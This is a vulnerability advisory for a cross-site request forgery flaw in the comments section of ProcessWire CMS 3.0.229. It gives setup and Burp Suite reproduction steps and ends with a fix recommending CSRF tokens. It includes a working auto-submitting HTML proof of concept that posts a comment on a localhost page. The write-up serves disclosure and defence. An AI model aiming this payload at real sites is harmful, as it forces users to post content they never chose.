DefensiumDevelopers/CVE-2024-41597.md

## CVE-2024-41597.md

      
    Raw
  

              CVE-2024-41597.md
            
          
    Cross-site Request Forgery (CSRF) vulnerability in the comments section of Processwire CMS 3.0.229


Description of the vulnerability

Vulnerability Type              : Cross-site Request Forgery (CSRF).

Vulnerable Software Version     : Processwire CMS 3.0.229

Tested on                       : Windows 10  , Wamp server 3.3.5

Vulnerability location          : http://localhost/earth/  (Here earth is the page with    comments enabled)


Vulnerability Details:

Cross-Site Request Forgery or CSRF is a security vulnerability that forces authenticated users to submit a request to the web application against which they are currently authenticated by exploiting the trust the web application has in an authenticated user.


Impact of the Vulnerability

An attacker can induce a user to post comments on any of the pages which support comments using this vulnerability. Using this vulnerability he could trick the user into posting malicious content as comments which can affect the credibility of the user.
CSRFs can also damage the reputation of the website and its administrators. This vulnerability can also cause resource abuse as comment sections can trigger resource-intensive operations.


Validation Steps


Either create an article and enable comments features  or visit an article that has comments enabled in them.
To add comments feature  to your page if absent, you can do the following :


Install the Comments fieldtype (FieldtypeComments ) from Admin > Modules menu


Now go to Admin > Setup > Fields and create a new field. Select ‘Comments’ as the fieldtype and give it a name you wish maybe “comments ”.


Next, you will see several options to configure, select that accordingly .


Now in the php file for your newly created page add the following lines of code .


Enter this where you want your comments to appear.


<?php echo $page->comments->render();
Enter this where you want the comments entry form to appear
<?php echo $page->comments->renderForm();
Thus the comments feature is added to your page.


Now turn on your burp proxy and submit a comment on the page .


Capture the request, remove the referrer header from the request and then generate a CSRF POC using the captured POST request .


An example of a POC is given below . Here the page that was created with the comments enabled is at the /earth endpoint
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/earth/" method="POST">
      <input type="hidden" name="cite" value="csrfbug" />
      <input type="hidden" name="email" value="testemail&#64;add&#46;com" />
      <input type="hidden" name="website" value="http&#58;&#47;&#47;aa&#46;com" />
      <input type="hidden" name="text" value="bug" />
      <input type="hidden" name="CommentForm&#95;submit" value="1" />
      <input type="hidden" name="page&#95;id" value="1026" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


Save this code snippet as an HTML file and open it.


Now a new comment has been posted on the page. An image indicating the same has been attached below.


Thus an attacker can trick the user into commenting on pages with comments enabled by exploiting this vulnerability.


Recommended Fix

CSRF tokens with significant entropy and are unpredictable, can be used with relevant requests to prevent CSRF vulnerability.